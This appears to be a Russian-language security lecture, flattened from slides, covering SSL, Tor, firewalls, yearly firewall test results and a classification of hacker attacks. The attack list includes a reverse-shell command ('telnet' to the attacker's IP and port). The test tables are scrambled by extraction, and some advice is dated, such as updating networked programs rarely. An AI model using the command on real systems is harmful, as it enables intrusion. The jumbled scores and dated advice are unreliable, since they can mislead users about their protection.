lect2014_14
advertisement
Протокол SSL SSL (Secure Sockets Layer) - криптографический протокол, который обеспечивает установление безопасного соединения между клиентом и сервером. SSL поддерживает 3 типа аутентификации: • аутентификация обеих сторон (клиент — сервер), • аутентификация сервера с неаутентифицированным клиентом • полная анонимность. Протокол рукопожатия (handshake): 1) Клиент подключается к SSL серверу. Запрос безопасного соединения представляет собой список поддерживаемых клиентом шифров и хэш-функций. 2) Из этого списка сервер выбирает самый сильный шифр и хэш-функцию, которую он также поддерживает, и уведомляет клиентов о принятом решении. Сервер отсылает это решение в виде цифрового сертификата (имя сервера, доверенный Центр Сертификации, и открытый ключ шифрования сервера). 3) Клиент шифрует случайное число с помощью открытого ключа сервера и отправляет результат на сервер. Сервер своим закрытым ключом расшифровывает случайное число. 4) Из случайного числа обе стороны создают ключ сеанса. Алгоритмы, использующиеся в SSL • Для обмена ключами и проверки их подлинности применяются: RSA, Diffie-Hellman, ECDH, SRP, PSK. • Для аутентификации: RSA, DSA, ECDSA. • Для симметричного шифрования: RC2, RC4, IDEA, DES, Triple DES или AES, Camellia. • Для хеш-функций: SHA, MD5, MD4 и MD2. Tor (The Onion Router) —программное обеспечение для реализации «луковой маршрутизации», позволяющей обеспечить анонимное соединение в сети. Каждый пакет, попадающий в систему, проходит через три различных сервера (нода), которые выбираются случайным образом. Перед отправлением пакет последовательно шифруется тремя ключами: сначала для третьей ноды, потом для второй, и, в конце концов, для первой. Когда первая нода получает пакет, она расшифровывает «верхний» слой шифра (аналогия с тем, как чистят луковицу) и узнает, куда отправить пакет дальше. Второй и третий сервер поступают аналогичным образом. Особенности технологии TOR: • Первый узел цепочки знает настоящий адрес клиента; • Последний узел цепочки видит исходное сообщение от клиента, хотя и не знает истинного отправителя; • Сервер-адресат видит исходное сообщение от клиента, хотя и не знает истинного отправителя; • Все интернет-шлюзы на пути от последнего узла сети Tor до сервераадресата видят исходное сообщение от клиента, хотя и не знают адреса истинного отправителя. Но они знают адрес последнего нода. Соединение с сервером с помощью технологии TOR (З,К – пара закрытого и открытого ключей) Сервер Нод 2 (пара ключей З2, К2) Нод 3 (пара ключей З3, К3) Кодированное K3: Пакеты Один из серверов TOR Список возможных нодов Кодированное K2: Адрес K3, Кодированное K3: Пакеты кодированное ключем K1: Адрес K2, Кодированное K2: Адрес K3, Кодированное K3: Нод 1 (пара ключей З1, К1) Пакеты Пользователь Системы Firewall Firewall (межсетевой экран, брандмауэр) – программно-аппаратный комплекс, обеспечивающий защиту локальной компьютерной сети (или отдельной рабочей станции) от враждебной внешней среды и от несанкционированных действий при взаимодействии с внешними сетями. Firewall защищает от: 1) Угроз неправомерного вторжения во внутреннюю сеть из внешней; 2) Угроз несанкционированного доступа во внешнюю сеть из внутренней. Основные функции Firewall: 1) Фильтрация проходящих через него информационных потоков; 2) Посредничество при реализации межсетевых взаимодействий (например, обеспечение протокольного преобразования отличающихся по реализации уровней модели OSI для объединяемых сетей). Важные дополнительные функции: кэширование информации (прокси) и трансляция адресов. Стандартная схема использования Firewall Схема использования Firewall с демилитаризованной зоной (DMZ) Схема использования Firewall в частных виртуальных сетях (VPN) Результаты тестирования Firewall (26 тестов, 2007 год) N 1 Firewall Online Armor Personal Firewall Оценка Защита N Firewall Оценка Защита 9625 Превосходная 100% 33 Norman Personal Firewall 750 Никакая 34 TheGreenBow Personal Firewall 750 Никакая 9625 Превосходная 100% 35 Panda Antivirus + Firewall 2007 650 Никакая 36 AVG Anti-Virus plus Firewall 500 Никакая 37 Armor2net Personal Firewall 500 Никакая 38 Ashampoo FireWall Pro 500 Никакая 39 Filseclab Personal Firewall 500 Никакая 40 Rising Personal Firewall 2007 500 Никакая 41 Prisma Firewall 250 Никакая 42 Windows Firewall XP SP2 0 Отсутствует 2 Outpost Firewall Pro 2008 3 Comodo Firewall Pro 4 Jetico Personal Firewall 9375 Превосходная 5 ProSecurity 1.40 8875 Очень хорошая 6 ZoneAlarm Pro 8600 Очень хорошая 9475 Превосходная Lavasoft Personal Firewall 8500 Kaspersky Internet Security 8475 9 System Safety Monitor 7975 Очень хорошая 10 Jetico Personal Firewall Free 7750 Очень хорошая 7 8 Очень хорошая Очень хорошая Результаты тестирования Firewall (73 теста, 2008 год) N Firewall 1 Outpost Firewall Pro 2009 6.5 2 Online Armor Personal Firewall 2.1 Оценка Защита N 99% Превосходная 100% 11 98% Превосходная 100% 3 Comodo Firewall Pro 3.0 FREE 95% Превосходная 4 ProSecurity 1.43 93% Превосходная 5 Privatefirewall 6.0 90% Превосходная Оценка Защита Jetico Personal Firewall 2.0 78% Хорошая 12 System Safety Monitor 2.3 77% Хорошая 13 Norton Internet Security 2009 71% Хорошая 14 Lavasoft Personal Firewall 70% Хорошая 15 Dynamic Security Agent 2.0 62% Плохая 16 Webroot Desktop Firewall 5.5 60% Плохая Firewall Online Armor Personal Firewall 2.1 FREE 89% 7 Kaspersky Internet Security 2009 87% Очень хорошая 17 Comodo Firewall Pro 2.4 FREE 55% Плохая 8 Netchina S3 2008 FREE 86% Очень хорошая 18 Trend Micro Internet Security Pro 27% Никакая 9 ZoneAlarm Pro 2009 86% Очень хорошая 19 G DATA InternetSecurity 19% Никакая 10 PC Tools Firewall Plus 4.0 FREE 85% Очень хорошая 25 Avira Premium Security Suite 11% Никакая 6 Очень хорошая Результаты тестирования Firewall (86 тестов, 2009 год) N 1 Firewall Comodo Internet Security 3.12 FREE Оценка Защита N 100% Превосходная 100% 12 2 Online Armor Personal Firewall 3.5.0.14 99% Превосходная 3 PC Tools Firewall Plus 6.0 FREE 99% Превосходная 96% Превосходная 93% Превосходная Kaspersky 4 Internet Security 2010 Outpost Firewall 5 FREE 2009 Outpost Security 6 Suite Pro 2009 Online Armor 7 Personal Firewall 3.5.0.14 FREE Jetico Personal 8 Firewall 2.0.2.8 Malware 9 Defender 2.2.2 Privatefirewall 10 6.0.20.14 Netchina S3 2008 11 3.5.5.1 FREE 92% Превосходная 89% Очень хорошая 89% Очень хорошая 85% Защита ZoneAlarm Pro 72% Хорошая 13 Norton Internet Security 2010 67% Хорошая 14 Lavasoft Personal Firewall 67% Хорошая 15 Webroot Desktop Firewall 54% Плохая 16 Trend Micro Internet Security Pro 29% Никакая 17 BitDefender Internet Security 2009 12% Никакая 18 ZoneAlarm Free Firewall 8.0 11% Никакая 19 Avira Premium Security Suite 9.0 10% Никакая … … … … 34 Mamutu 1.7.0.23 2% Никакая Превосходная 92% 88% Оценка Очень хорошая Очень хорошая Firewall Результаты тестирования Firewall (142 тестов, 2010 год) N 1 2 3 Оценка Защита N 100% Превосходная 100% 12 Online Solutions Security Suite 1.5 99% Превосходная Outpost Security Suite Pro 7.0 97% Firewall Comodo Internet Security 4.0 FREE Kaspersky 4 Internet Security 2011 11.0 Malware 5 Defender 2.6 Privatefirewall 7.0 6 FREE Outpost Firewall 7 FREE 2009 ZoneAlarm 8 Extreme Security 9.1 Rising Internet 9 Security 2010 PC Tools Firewall 10 Plus 6.0 FREE Norton Internet 11 Security 2010 92% Защита Jetico Personal Firewall 2 28% Никакая 13 BitDefender Int. Security 2010 24% 14 Dr.Web Security Space Pro 6.0 14% 15 CA Internet Security Suite Plus 2010 12% Никакая 16 F-Secure Internet Security 2010 9% Никакая 17 Trend Micro Internet Security Pro 2010 9% Никакая 18 ZoneAlarm Free Firewall 9 FREE 7% Никакая Превосходная Превосходная 90% Очень хорошая 86% Очень хорошая 71% Хорошая 59% Оценка Плохая Firewall Никакая Никакая 55% Плохая 51% Плохая 19 Avira Premium Security Suite 10 3% Никакая 40% Очень плохая … 22 Panda Internet Security 2010 1% Никакая Результаты тестирования Firewall (148 тестов, 2011 год) N 1 Firewall Comodo Internet Security 5.3 FREE Оценка Защита N 100% Превосходная 100% 12 2 Online Solutions Security Suite 1.5 99% Превосходная 3 Privatefirewall 7.0 FREE 98% Превосходная 97% Превосходная 97% Превосходная 97% Превосходная 4 5 6 7 8 9 Outpost Security Suite FREE 7.0 Outpost Security Suite Pro 7.5 BitDefender Int. Security 2011 Kaspersky Internet Security 2012 12.0 Malware Defender 2.7 FREE PC Tools Internet Security 2011 8.0 Jetico Personal 10 Firewall 2.1 ZoneAlarm 11 Extreme Sec 2012 93% 91% Оценка Защита Rising Internet Security 2010 34% Очень плохая 13 CA Internet Security Suite Plus 2010 30% Очень плохая 14 Norton Internet Security 2010 20% Никакая 15 avast! Internet Security 6.0 15% Никакая 16 Dr.Web Security Space Pro 6.0 14% Никакая 17 F-Secure Internet Security 2011 9% Никакая … 20 ZoneAlarm Free Firewall 9.2 FREE 7% Никакая Превосходная Превосходная Firewall 90% Очень хорошая 88% Очень хорошая … 23 Avira Premium Security Suite 10 3% Никакая 72% Хорошая … 29 TrustPort Internet Security 2011 1% Никакая Результаты тестирования Firewall (104 теста, 2012 год, matousec.com) N 1 2 3 4 5 6 7 8 9 Firewall Comodo Internet Security 5.9 FREE Privatefirewall 7.0 FREE Kaspersky Internet Security 2012 13.0 Outpost Security Suite Pro 7.5.2 Outpost Security Suite FREE 7.1 VirusBuster Internet Security Suite 4.1 Jetico Personal Firewall 2.1 ESET Smart Security 5.2 ZoneAlarm Extreme Sec 2012 10 ZoneAlarm Free Antivirus + Firewall 11 Total Defense Internet Security Suite Оценка Защита 94% Превосходная 88% Очень хорошая 86% 86% 71% 71% N Защита avast! Internet Security 7.0 15% Никакая 13 Dr.Web Security Space 7.0 11% Никакая 14 Norton Internet Security 2012 10% Никакая 15 Avira Internet Security 2013 9% Никакая 16 Bitdefender Total Security 2013 9% Никакая 17 TrustPort Total Protection 2013 8% Никакая Очень хорошая Хорошая Оценка 12 Очень хорошая Хорошая Firewall 59% Плохая 51% Плохая 18 Norman Security Suite PRO 9.0 6% Никакая 43% Очень плохая 19 PC Tools Internet Security 2012 6% Никакая 34% Очень плохая … 35 AhnLab V3 Internet Security 8.0 2% Никакая 21% Никакая Результаты тестирования Firewall (110 тестов, 2013 год, matousec.com) N 1 2 3 4 5 6 7 8 9 Firewall Comodo Internet Security 6.3 FREE Outpost Security Suite Pro 8.0.4 Privatefirewall 7.0.29 FREE Kaspersky Internet Security 2013 13.0.1 SpyShelter Firewall 2.2 Outpost Security Suite FREE 7.1.1 VirusBuster Internet Security Suite 4.1 Jetico Personal Firewall 2.1 ESET Smart Security 6.0 Оценка Защита 97% Превосходная 90% Превосходная 88% N Firewall Оценка Защита 12 avast! Internet Security 8.0 32% Очень плохая Очень хорошая 13 Total Defense Internet Security Suite 8.0 31% Очень плохая 86% Очень хорошая 13 Dr.Web Security Space 8.2.1 24% Никакая 85% Очень хорошая 14 Webroot Secure Anywhere Complete 22% Никакая 71% Хорошая 15 eScan Internet Security Suite 14 14% Никакая Хорошая 16 K7 TotalSecurity 2013 9% Никакая 58% Плохая 17 Norton Internet Security 2012 9% Никакая 55% Плохая 19 Bitdefender Total Security 2013 8% Никакая 20 Avira Internet Security 2013 6% Никакая … 37 VIPRE Internet Security 2014 2% Никакая 71% 10 ZoneAlarm Extreme Sec 2013 34% Очень плохая 11 ZoneAlarm Free Antivirus + Firewall 34% Очень плохая Результаты тестирования Firewall (110 тестов, 2014 год, matousec.com) N 1 2 3 4 5 6 7 8 9 Firewall Comodo Internet Security Premium 7.0 FREE Outpost Security Suite Pro 9.1 Kaspersky Internet Security 2015 15.0.0 SpyShelter Firewall 9.2 Privatefirewall 7.0.30.3 FREE Outpost Security Suite FREE 7.1.1 VirusBuster Internet Security Suite 4.1 Jetico Personal Firewall 2.1 ESET Smart Security 7.0 Оценка Защита 97% Превосходная 90% Превосходная 89% 89% 88% 71% 71% 58% Очень хорошая Очень хорошая Очень хорошая Оценка Защита 12 Total Defense Internet Security Suite 9.0 30% Очень плохая 13 Dr.Web Security Space 9.0 24% Никакая 13 Webroot Secure Anywhere Complete 23% Никакая 14 Bitdefender Total Security 2014 19% Никакая 15 BullGuard Internet Security 2014 16% Никакая 16 eScan Internet Security Suite 14 14% Никакая 17 Avira Internet Security 2013 9% Никакая 18 K7 TotalSecurity 2013 9% Никакая N Хорошая Хорошая Плохая 55% Плохая Firewall 10 ZoneAlarm Extreme Sec 2013 34% Очень плохая 19 Norton Internet Security 2012 9% Никакая 11 ZoneAlarm Free Antivirus + Firewall 34% Очень плохая … 37 Zillya! Internet Security 1.1 2% Никакая Virusbtn.com – тест антивирусов (август 2011) Virusbtn.com – тест антивирусов (август 2012) Virusbtn.com – тест антивирусов (август 2013) Virusbtn.com – тест антивирусов (август 2014) Некоторые правила при работе с FIREWALL 1) Установите МАКСИМАЛЬНЫЙ уровень безопасности в настройках файервола. 2) Имейте ограниченное количество программ, для которых Вы разрешаете любую сетевую активность (Internet Explorer, Skype, ICQ, один из файловых менеджеров, например, Total Commander, какой-нибудь Torrent клиент, один из почтовых клиентов, например The Bat). Для остальных программ прямо запрещайте любую сетевую активность. 3) Пользуйтесь программами, которые хорошо знаете. Как можно реже обновляйте программы из основного списка (пункт 2), для которых разрешена сетевая активность. Для остальных программ (особенно новых устанавливаемых) в исключительных случаях разрешайте ОДНОКРАТНУЮ сетевую активность только при онлайн-регистрации программы при ее установке. 4) Помните, что доверяя файерволу, Вы ДОВЕРЯЕТЕ НЕИЗВЕСТНОЙ ВАМ КОМАНДЕ ПРОФЕССИОНАЛОВ. Не доверяйте файерволу защиту персональной информации (кредитные карты, пароли доступа и пр.). Храните такую информацию на изолированных от Интернета и локальных сетей компьютерах или на бумажных носителях информации. Классификация хакерских атак: 1. Fishing (или Фишинг). Очень широкое понятие. Смысл его в том, чтобы получить от пользователей информацию (пароли, номера кредитных карт и т.п.) или деньги. Этот приём направлен не на одного пользователя, а на многих. Например, письма якобы от службы технической поддержки рассылаются всем известным клиентам какого-либо банка. В письмах обычно содержится просьба выслать пароль к учётной записи, якобы из-за проведения каких-либо технических работ. Несмотря на то, что пользователей предупреждают, что никакую подобную информацию от них никто из работников не может потребовать, и эта информация не должна разглашаться, всегда находятся те, кто с удовольствием «дарит» свои номера, пароли и прочее. Подобные письма, обычно очень правдоподобно и грамотно составлены, что, возможно, подкупает доверчивых пользователей. Нужно оговориться, что приёмов для фишинга есть несколько, помимо писем. Рекомендации: Помните, что паранойя – лучшая защита. Не доверяйте ничему подозрительному, никому не давайте свои данные. Администраторам не нужно знать Ваш пароль, если он предназначен для доступа к их серверу. Они полностью управляют сервером и могут сами посмотреть пароль или изменить его Классификация хакерских атак: 2. Социальная инженерия – это не технический, а психологический приём. Пользуясь данными, полученными при инвентаризации, взломщик может позвонить какому-либо пользователю (например, корпоративной сети) от имени администратора и попытаться узнать у него, например, пароль. Это становится возможным, когда в больших сетях, пользователи не знают всех работников, и тем более не всегда могут точно узнать их по телефону. Кроме этого, используются сложные психологические приёмы, поэтому шанс на успех сильно возрастает. Рекомендации: те же самые. Если действительно есть необходимость, то сообщите нужные данные лично. В том случае, если Вы записали пароль на бумаге, не оставляйте её где попало и по возможности уничтожайте, а не просто выбрасывайте в мусорную корзину. 3. DoS (Denial of Service или Отказ от Обслуживания). Это скорее не отдельная атака, а результат атаки; используется для вывода системы или отдельных программ из строя. Для этого взломщик особым образом формирует запрос к какой-либо программе, после чего она перестаёт функционировать. Требуется перезарузка, чтобы вернуть рабочее состояние программы. Часто встречается мнение, что DoS, это то же самое, что и атака типа Flood и что вообще нужно соединить все атаки, которые приводят к отказу системы под общим названием DoS. Классификация хакерских атак: 4. Flood (Флуд или Поток/Затопление). С некоторого количества машин (в этом случае атака будет называться DDoS Distributed Denial of Service. Распределенная атака на отказ от обслуживания), как правило «Зомби» посылают жертве максимально возможное количество запросов (например, запросы на соединение). От этого жертва не успевает отвечать на каждый запрос, и в итоге не отвечает на пользовательские запросы. Разновидности: --SYN Flood – Затопление атакуемого компьютера пакетами типа SYN. Как известно, компьютер должен на такой пакет ответить пакетом типа SYN/ACK. Если пакетов SYN слишком много, то компьютер не успевает отвечать на каждый и не может принимать пакеты от других компьютеров. --ICMP Flood или Ping Flood – То же самое, только пакетами ICMP. Система должна ответить на такой пакет, тем самым создаётся большое количество пакетов, которые снижают производительность (пропускную способность) канала. --Identification Flood (Ident Flood). Похожа на ICMP Flood, но ответ на запрос на порт 113 типа identd занимает у системы больше времени, поэтому атака более эффективна. --DNS Flood – атака направлена на DNS сервера. Их наводняют DNS запросы, на которые сервер не успевает отвечать, таким образом, на Ваши запросы он так же ответить не сможет. Как следствие, Вы не сможет посещать Интернет сайты. --DDoS DNS – Адрес, по которому должен ответить DNS-сервер на эти запросы, равен адресу самого DNS сервера, т.е. его не только наводняют запросы DNS, но он же ещё и отправляет их себе же. --Boink (Bonk, Teardrop) – Жертве посылается огромное количество сильно фрагментированных пакетов, но при этом фрагменты большого размера. 5. --Pong – то же самое, что и любой другой из вышеперечисленных видов, отличие только в том, что адрес отправителя поддельный. Классификация хакерских атак: 5. Smurf (атака, направленная на ошибки реализации TCP-IP протокола). Сейчас этот вид атаки считается экзотикой, однако раньше, когда TCP-IP протокол был достаточно новым, в нём содержалось некоторое количество ошибок, которые позволяли, например, подменять IP адреса. Однако, этот тип атаки применяется до сих пор. Некоторые специалисты выделяют TCP Smurf, UDP Smurf, ICMP Smurf. Конечно, такое деление основано на типе пакетов. 6. Ping-of-Death (или Jolt, SSPing) – Атака заключается в том, что жертве посылается фрагментированный ICMP пакет, но размер фрагмента очень большой (64кБ). Старые версии ОС, например Windows 95, повисают. Эту атаку можно осуществить с помощью программы Shadow Security Scanner. 7. UDP Storm (UDP шторм) – используется в том случае, если на жертве открыто как минимум два UDP порта, каждый из которых отсылает отправителю какой-нибудь ответ. Например, порт 37 с сервером time на запрос отправляет текущую дату и время. Взломщик отправляет UDP пакет на один из портов жертвы, но в качестве отправителя указывает адрес жертвы и второй открытый UDP порт жертвы. Тогда порты начинают бесконечно отвечать друг другу, что снижает производительность. Шторм прекратится, как только один из пакетов пропадёт (например, из-за перегрузки ресурсов). Классификация хакерских атак: 8. UDP Bomb – взломщик отправляет системе UDP пакет с некорректными полями служебных данных. Данные могут быть нарушены как угодно (например, некорректная длина полей, структура). Это может привести к аварийному завершению. 9. Land – жертве посылается пакет на определённый порт, но адрес отправителя устанавливается тот же самый, что и жертвы, а порт отправителя равен порту получателя. (пример: получатель: 1.1.1.1 порт 111 отправитель: 1.1.1.1 порт 111). Жертва пытается установить соединение с собой, отчего может произойти повисание системы. Подобная атака также может быть на 100% эффективна против некоторых маршрутизаторов. 10. Mail Bombing («Почтовая бомбёжка»). Если на атакуемом компьютере есть почтовый сервер, то на него посылается огромное количество почтовых сообщений с целью вывода его из строя. 11. Sniffing (Сниффинг или прослушивание сети). В том случае, если вместо коммутаторов в сети установлены концентраторы, полученные пакеты рассылаются всем компьютерам в сети, а дальше уже компьютеры определяют для них этот пакет или нет. Если взломщик получит доступ к компьютеру, который включен в такую сеть, или получит доступ к сети непосредственно, то вся информация, передаваемая в переделах сегмента сети, включая пароли, станет доступна. Взломщик просто поставит сетевую карту в режим прослушивания и будет принимать все пакеты независимо от того, ему ли они предназначались. Классификация хакерских атак: 12. IP Hijack (IP хайджек). Если есть физический доступ к сети, то взломщик может «врезаться» в сетевой кабель и выступить в качестве посредника при передаче пакетов, тем самым он будет слушать весь трафик между двумя компьютерами. 13. Dummy ARP (Ложный ARP). ARP сервер, маршрутизатор или коммутатор знают какие IP принадлежат MAC адресам (т.е. сетевым картам). При возможности физического доступа к сети, взломщик может подделать ARP ответ и выдать себя за другой компьютер в сети, получив его IP. 14. Dummy DNS Server (ложный DNS Сервер). Если настройки сети поставлены в автоматический режим, то при включении в сеть, компьютер «спрашивает» (т.е. отправляет широковещательный пакет) кто будет его DNS сервером, к которому он в дальнейшем будет отправлять DNS запросы. При наличии физического доступа к сети, взломщик может перехватить такой широковещательный запрос и ответить, что его компьютер будет DNS сервером. 15. Fuzzy (Фаззи). Фильтры могут быть настроены на блокировку определённых видов пакетов, например UDP. Взломщик может сфабриковать пакет так, что фильтр не поймет, что этот пакет UDP и не отфильтрует его, и он попадёт по назначению. Классификация хакерских атак: 16. Puke – взломщик фабрикует ответ ICMP unreachable (ошибка удалённой системы), что спровоцирует клиента на отключение от сервера. Используется скорее как вспомогательное средство, в том случае, если какой-либо клиент должен быть отключён от сервера для проведения атаки. 17. Fake unreachable – взломщик фабрикует сообщение о том, что пакет не может быть доставлен (unreachable), тем самым заставляет сервер думать, что у клиента сбой и пакеты не доставляются по назначению. Это может спровоцировать сервер отключить клиента. Тоже вспомогательное средство, похоже на №17, только направлен не на клиента, а на сервер. 18. Back Connect/Pipes/Reverse (Обратный сеанс или Реверс) - взломщик вынуждает атакуемый компьютер подключиться к компьютеру взломщика. Например на атакуемом компьютере можно выполнить команду telnet [ip.адрес.взломщика] [порт]. После этого взломщик, по сути дела получает командную строку (командную оболочку или Шелл/Shell) на атакуемом компьютере. 19. Shatter - Уязвимость Windows систем, которая может быть использована только локально. Основана на том, что у каждого окна в Windows, у которого есть поле для ввода, есть и максимальная длина вводимого значения. Переполнение этой строки приводит к попаданию определенного кода в стек и выполнению его процессором. 20. IP-Spoofing (Спуфинг или Подмена IP адреса). 21. Host spoofing (Подмена хоста). Классификация хакерских атак: 22. Software vulnerabilities (Ошибки ПО). 23. Buffer Overflow (Переполнение буфера). 24. Nuke (WinNuke или Нюк) – устаревшая атака (несовершенство NetBIOS). 25. Cross User Attack (межпользовательская атака) – Основана на несовершенстве протокола TCP (фальсификация одним пользователем информации для другого пользователя). 26. Атака на CGI – получение доступа к содержимому серверов и модификация кода серверной части сайтов. Основана на возможностях языков программирования PERL, PHP, небрежном программировании серверных приложений на этих языках. 27. SQL Injection (SQL инъекция) – взлом SQL баз данных с помощью специальных запросов. Возможна при небрежном программировании и настройке SQL или mySQL. 28. HRS (HTTP Resource Splitting) – похищение cookie, фальсификация сервиса. 29. Cross User Defacement – фальсификация сервиса. 30. Hijacking Pages – сервер посылает HTML страницу, предназначенную для одного пользователя, другому пользователю (хакеру). 31. CSS/XSS (Cross-Site Scripting) – похищение cookie. 32. NULL Byte (или Нулевой байт) – атака на PERL. 33. Include Bug. PHP-Include Bug – атаки на PHP.
